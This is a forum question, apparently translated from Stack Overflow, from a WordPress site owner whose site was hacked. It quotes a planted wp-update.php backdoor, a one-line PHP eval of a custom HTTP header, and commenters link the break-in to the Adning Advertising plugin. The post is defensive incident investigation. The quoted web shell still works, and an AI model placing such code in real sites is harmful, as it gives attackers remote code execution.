【发布时间】:2020-10-22 21:09:17
【问题描述】:
所以我们的网站不幸被黑了。
他们在我们的 wp-admin 目录中创建了一个名为 wp-update.php 的文件,其中包含以下代码:
<?php @eval($_SERVER['HTTP_4CD44849DA572F7C']); ?>
我的问题是黑客如何使用 $_SERVER 传入他的脚本?
【问题讨论】:
-
我最近在我的 wp-admin 文件夹中发现了相同的文件,代码如下: 您是否愿意比较我们两个网站上安装的插件,看看哪些是易受攻击的?
-
更新:经过进一步调查,黑客攻击是 Adning Advertising 插件的结果。尽快更新到 1.5.6 版本。
-
@Zeno 抱歉回复晚了,我们目前正在调查 Adning 并已联系作者和 Envato 本身。如需更多信息,请参考本主题:wordpress.org/support/topic/wp-admin-wp-update-a-virus
标签: php wordpress security server